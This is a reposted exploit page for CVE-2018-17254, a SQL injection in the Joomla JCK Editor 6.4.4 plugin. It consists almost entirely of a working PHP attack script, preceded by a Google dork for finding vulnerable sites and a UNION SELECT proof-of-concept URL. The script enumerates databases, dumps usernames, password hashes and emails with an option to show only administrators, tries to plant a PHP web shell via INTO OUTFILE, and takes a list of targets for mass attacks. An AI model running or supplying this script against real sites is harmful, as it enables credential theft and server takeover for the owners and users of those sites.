joomla jck editor 6.4.4 parent sql injection (2)

▸▸▸ Exploit & Vulnerability >>   webapps exploit & php vulnerability




Online Vulnerability Scanner Tools
joomla jck editor 6.4.4 parent sql injection (2) Code Code... 
				
# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
# Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Date: 05/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

<?php

$vuln_file = '/editors/jckeditor/plugins/jtreelink/dialogs/links.php';

function payload($str1, $str2=""){
	return '?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,'.$str1.',NULL,NULL,NULL,NULL,NULL'.$str2.'--%20aa'; #"
}


function get_request($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
	#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080");
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

function parse_columns($columns){
	$parsed_columns = array();
	foreach($columns as $col){
		array_push($parsed_columns, $col);
		array_push($parsed_columns, "0x242324"); //delimiter = $#$
	}
	return $parsed_columns;
}

function inject($url, $payload){
	global $vuln_file;
	$request = get_request($url.$vuln_file.$payload);
	preg_match_all('/url ="(.*)">/', $request, $output);
	return $output;
}
######

function is_vulnerable($url){
	global $vuln_file;
	$output = inject($url, payload("0x6861636b6564"));
	if(isset($output[1][0])){
		if(base64_encode($output[1][0]) == "aGFja2Vk"){ //checking if we can inject
			return 1;
		}
	}
	return 0;
}

function get_db_names($url){
	global $vuln_file;
	$db_names = array();
	$output = inject($url, payload("schema_name", "%20from%20information_schema.schemata"));
	foreach($output[1] as $db){
		array_push($db_names, $db);
	}
	return $db_names;
}

function get_table_names($url, $db){
	global $vuln_file;
	$table_names = array();
	$output = inject($url, payload("table_name", "%20from%20information_schema.tables%20WHERE%20table_schema=%27".$db."%27"));
	foreach($output as $table){
		array_push($table_names, $table);
	}
	return $table_names;
}

function get_column_names($url, $table){
	global $vuln_file;
	$column_names = array();
	$output = inject($url, payload("column_name", "%20from%20information_schema.columns%20WHERE%20table_name=%27".$table."%27"));
	foreach($output as $column){
		array_push($column_names, $column);
	}
	return $column_names;
}

function dump_columns($url, $columns, $dbname, $table){
	global $vuln_file;
	$column_dump = array();
	$related_arr = array();
	$data = array();
	$output = inject($url, payload("concat(".implode(',', parse_columns($columns)).")", "%20from%20".$dbname.".".$table));
	foreach($output[1] as $column){
		$exploded = explode("$#$", $column);
		array_push($data, $exploded);
	}
	foreach($data as $user_info){
		array_pop($user_info);
		array_push($related_arr, array_combine($columns, $user_info));
	}
	return $related_arr;
}

function rce($url){	//probably won't work =(
	global $vuln_file;
	if(!is_vulnerable($url)){
		die(red("[-] Target isn't vulnerable."));
	}
	$server_root = array("/var/www/", "/var/www/html/", "/usr/local/apache2/htdocs/", "/var/www/nginx-default/", "/srv/www/", "/usr/local/apache2/htdocs/");
	$rand_content = "AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2";
	$payl0ad = "'<?php system(\$_GET[0]); ?> ".$rand_content."'";
	$filename = rand(1000, 7359).".php";
	echo cyan("[i]")." Trying to upload a RCE shell...\n";
	foreach($server_root as $path){
		inject($url, payload($payl0ad, " INTO OUTFILE '".$path.$filename."'"));
	}
	$get_shell = get_request($url."/".$filename);
	if(strpos($get_shell, $rand_content) !== false){
		echo green("[+] RCE shell successfully uploaded! =)\n");
		die("Usage: ".$url."/".$filename."?0=whoami\n");
	}else{
		echo(red("[-] ")."Could not upload RCE shell. Maybe stacked queries are not supported. =(\n");
		die(cyan("[i] ")."But you can still inject SQL commands! What about dumping the users table? =)\n");
	}
}

function read_file($url, $file){
	global $vuln_file;
}

############

function green($str){
	return "\e[92m".$str."\e[0m";
}
function red($str){
	return "\e[91m".$str."\e[0m";
}
function yellow($str){
	return "\e[93m".$str."\e[0m";
}
function cyan($str){
	return "\e[96m".$str."\e[0m";
}

function banner(){
	echo "
   ___  _____  _   __ _____
  |_  |/  __ \| | / /|  _  \
    | || /  \/| |/ / | | | | _   _  _ __ ___   _ __    ___  _ _
    | || |    |    \ | | | || | | || '_ ` _ \ | '_ \  / _ \| '__|
/\__/ /| \__/\| |\  \| |/ / | |_| || | | | | || |_) ||  __/| |
\____/  \____/\_| \_/|___/   \__,_||_| |_| |_|| .__/  \___||_|
                     ".green("Coder: ").yellow("Nicholas Ferreira")." | |
                                              |_|

";
}
$target = 0;
$rce = 0;
function check(){
	global $argv;
	global $argc;
	global $target;
	global $rce;
	global $target_list;
	global $save_output;
	global $verbose;
	global $less;
	global $specified_db;
	$short_args = "u:t:v::h::l::r::d::";
	$long_args = array("url:","targets::","verbose::","help::","less::","rce::", "db::");
	$options = getopt($short_args, $long_args);

	if(isset($options['h']) || $argc == 1 || isset($options['help'])){
		echo "JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254)

	Usage: php ".$argv[0]." -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db]

	-u, --url: Path to Joomla! plugins (e.g. website.com/site/plugins/)
	-h, --help: Help
	-v, --verbose: Verbose mode (print tables)
	-l, --less: Less outputs (only Administrator usernames and passwords)
	-t, --targets: Load a list of targets
	-r, --rce: Try to upload a RCE shell
	-d, --db: Specifies the DB to dump

	";

		}

		if(isset($options['u'])){
			$target = $options['u'];
		}elseif(isset($options['url'])){
			$target = $options['url'];
		}else{
			$target = "";
		}

		isset($options['v']) || isset($options['verbose']) ? $verbose = 1 : $verbose = 0;
		isset($options['l']) || isset($options['less']) ? $less = 1 : $less = 0;
		isset($options['r']) || isset($options['rce']) ? $rce = 1 : $rce = 0;
		isset($options['f']) ? $target_list = $options['f'] : $target_list = 0;

		if(isset($options['t'])){
			$target_list = $options['t'];
		}elseif(isset($options['targets'])){
			$target_list = $options['targets'];
		}else{
			$target_list = 0;
		}

		if(isset($options['d'])){
			$specified_db = $options['d'];
		}elseif(isset($options['db'])){
			$specified_db = $options['db'];
		}else{
			$specified_db = 0;
		}


		if(strlen($target_list) < 2){
			if($target !== ""){ // check if URL is ok
				if(!preg_match('/^((https?:\/\/)|(www\.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(\/.*)?$/', $target)){
					die(red("[i] The target must be a URL.\n"));
				}
				if(strpos($target, "plugins") == false){
					die(red("[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)\n"));
				}
			}else{
				die(cyan("[-] ")."You can get help with -h.\n");
			}
		}

		if($target_list !== 0){ //check if target list is readable
			if(!file_exists($target_list)){
				die(red("[-] ")."Could not read target list file.\n");
			}
		}
}



function exploit($url){ // returns users and passwords
	global $vuln_file;
	global $verbose;
	global $rce;
	global $specified_db;
	global $less;
	echo cyan("\n=========================| ".str_replace("plugins", "", $url)." |=========================\n\n\n");
	echo cyan("[+] ")."Checking if target is vulnerable...\n";
	if (is_vulnerable($url)){
		$main_db = inject($url, payload("database()"))[1];
		$user_table = "";
		$hostname = inject($url, payload("@@hostname"))[1];
		$mysql_user = inject($url, payload("user()"))[1];
		$mysql_version = inject($url, payload("@@version"))[1];
		$connection_id = inject($url, payload("connection_id()"))[1];

		echo green("[+] Target is vulnerable! =)\n\n");
		echo cyan("[i] ")."Hostname: ".yellow($hostname[0])."\n";
		echo cyan("[i] ")."Current database: ".yellow($main_db[0])."\n";
		echo cyan("[i] ")."MySQL version: ".yellow($mysql_version[0])."\n";
		echo cyan("[i] ")."MySQL user: ".yellow($mysql_user[0])."\n";
		echo cyan("[i] ")."Connection ID: ".yellow($connection_id[0])."\n\n";

		if($rce){
			rce($url);
		}


		echo cyan("[+] ")."Getting DB names...\n";
		$dbs = get_db_names($url);
		if(count($dbs) == 0){
			echo("[-] There are no DBs available on this target. =(\n");
		}

		$db_list = array();
		foreach($dbs as $db){
			$num_table = count(get_table_names($url, $db)[1]);
			echo green("[+] DB found: ").cyan($db." [".$num_table." tables]")."\n";
			array_push($db_list, $db);
		}
		if($main_db == "" && !$specified_db){
			echo(red("[-] Could not find Joomla! default DB. Try to dump another DB with -d. \n"));
		}
		if($specified_db !== 0){ // if user doesn't specify a custom db
			echo cyan("\n[+] ")."Getting tables from ".yellow($specified_db)."...\n";
			$tables = get_table_names($url, $specified_db);
		}else{
			foreach($db_list as $new_db){
				if($new_db !== "test" && strlen(strpos($new_db, "information_schema") !== false) == 0){ // neither test nor i_schema
					echo cyan("\n[+] ")."Getting tables from ".yellow($new_db)."...\n";
					$tables = get_table_names($url, $new_db);
				}
			}
		}
		echo cyan("[+] ").yellow(count($tables[1]))." tables found! \n";
		if(count($tables[1]) == 0){
			echo(red("[-] "."Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. \n"));
		}

		foreach($tables[1] as $table){
			if($verbose) echo $table."\n";
			if(strpos($table, "_users") !== false){
				$user_table = $table;
			}
		}

		if($user_table == ""){
			echo(red("[-] Could not find Joomla default users table. Try to find it manually!\n"));
		}

		echo cyan("[+] ")."Getting columns from ".yellow($user_table)."...\n";
		$columns = get_column_names($url, $user_table);

		if(count($columns) == 0){
			echo(red("[-] There are no columns on this table... =(\n"));
		}
		if($verbose){
			echo cyan("[+] ")."Columns found:\n";
			foreach($columns[1] as $coll){
				echo $coll."\n";
			}
		}
		echo cyan("[+] ")."Dumping usernames from ".yellow($user_table)."...\n";

		$dump = dump_columns($url, array("id","usertype", "name","username","password","email","lastvisitDate"), $db, $user_table);

		if(is_array($dump) && count($dump) == 0){
			$new_dump = dump_columns($url, array("id","name","username","password","email","lastvisitDate"), $db, $user_table);
			if(count($new_dump) == 0){
				echo(red("[-] This table is empty! =(\n"));
			}else{
				$dump = $new_dump;
				$usertype = 0;
			}
		}else{
			$usertype = 1;
		}
		echo cyan("\n[+] ")."Retrieved data:\n";
		foreach($dump as $user){
		if($usertype){
			$adm = strpos($user['usertype'], 'Administrator') !== false;
		}else{
			$adm = false;
		}
		if($less){
			if(strpos($user['usertype'], "Administrator") !== false){
				echo "\n=============== ".green($user['username'])." ===============\n";
				foreach($user as $key => $data){
					if(strlen($data) > 0){
							if($key == "username" || $key == "password" || $adm){
								echo($key.": ".red($data)."\n");
							}else{
								echo($key.": ".$data."\n");
							}
					}
				}
			}

		}else{
			echo "\n=============== ".green($user['username'])." ===============\n";
			foreach($user as $key => $data){
				if(strlen($data) > 0){
						if($key == "username" || $key == "password" ||  $adm){
							echo($key.": ".red($data)."\n");
						}else{
							echo($key.": ".$data."\n");
						}
					}
				}
			}

		}

		echo(green("\nExploit completed! =)\n\n\n"));

	}else{
		echo(red("[-] Apparently, the provided target is not vulnerable. =(\n\n"));
		echo(cyan("[i] ")."This may be a connectivity issue. If you're persistent, you can try again.\n");
	}
}


banner();
check();

if(strlen($target_list) >1){
	$targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline
	foreach($targets as $website){
		if($rce){
			rce($target);
		}else{
			if(strlen($website) > 1){
				exploit($website); //multiple targets
			}
		}
	}
}else{
	exploit($target); //single target
}

?>

Joomla jck editor 6.4.4 parent sql injection (2) Vulnerability / Exploit Source : Joomla jck editor 6.4.4 parent sql injection (2)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.